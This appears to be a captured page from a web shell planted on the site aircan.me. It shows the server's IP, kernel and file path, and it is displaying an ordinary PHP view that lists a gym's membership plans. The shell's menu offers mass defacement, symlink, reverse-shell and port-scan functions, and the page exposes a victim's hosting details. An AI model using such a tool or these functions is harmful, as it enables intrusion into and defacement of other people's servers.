Tul xxx Tul
User / IP
:
216.73.216.191
Host / Server
:
45.84.207.204 / aircan.me
System
:
Linux lt-bnk-web1726.main-hosting.eu 5.14.0-611.36.1.el9_7.x86_64 #1 SMP PREEMPT_DYNAMIC Tue Mar 3 11:23:52 EST 2026 x86_64
Command
|
Upload
|
Create
Mass Deface
|
Jumping
|
Symlink
|
Reverse Shell
Ping
|
Port Scan
|
DNS Lookup
|
Whois
|
Header
|
cURL
:
/
home
/
u931257429
/
domains
/
aircan.me
/
public_html
/
gimnasiofitnes
/
app
/
Views
/
cliente
/
Viewing: memberships.php
<?= $this->extend('layout/app'); ?> <?php $this->section('title'); ?> Mi Panel <?php $this->endSection(); ?> <?php $this->section('content'); ?> <div class="container mt-4"> <h2 class="mb-4 text-center text-primary fw-bold">Nuestros Planes</h2> <div class="row gy-4"> <?php $currency = get_currency(); foreach ($plans as $plan): $amount = (float) $plan['amount']; if (!empty($plan['discount_type']) && !empty($plan['discount_value'])) { if ($plan['discount_type'] === 'percent') { $amount -= $amount * ((float) $plan['discount_value'] / 100); } elseif ($plan['discount_type'] === 'fixed') { $amount -= (float) $plan['discount_value']; } } ?> <div class="col-12 col-md-6 col-lg-4 d-flex"> <div class="card shadow-lg border-0 rounded-4 w-100 d-flex flex-column"> <!-- Cabecera del plan --> <div class="card-header bg-light d-flex justify-content-between align-items-center py-3 px-4"> <h5 class="mb-0 fw-bold text-primary"><?= esc($plan['name']) ?></h5> <i class="fas fa-dumbbell text-warning fs-4"></i> </div> <!-- Cuerpo --> <div class="card-body d-flex flex-column justify-content-between p-4"> <div class="text-muted mb-4"><?= $plan['description'] ?></div> <div class="mb-3"> <span class="h4 fw-bold text-success"><?= $currency ?> <?= number_format($amount, 2) ?></span> <?php if (!empty($plan['discount_value'])): ?> <span class="text-decoration-line-through text-muted ms-2"> <?= $currency ?> <?= number_format($plan['amount'], 2) ?> </span> <span class="badge bg-danger ms-2"> <?= ($plan['discount_type'] === 'percent') ? "{$plan['discount_value']}% OFF" : "¡Oferta Especial!" ?> </span> <?php endif; ?> </div> <a href="<?= site_url('membresias/show/' . $plan['slug']) ?>#section-payment" class="btn btn-primary btn-sm w-100 mt-auto" target="_blank"> <i class="fas fa-eye me-2"></i> Ver Detalle </a> </div> </div> </div> <?php endforeach; ?> </div> </div> <?php $this->endSection(); ?> <?php $this->section('js'); ?> <?php $this->endSection(); ?>
Coded With 💗 by
0x6ick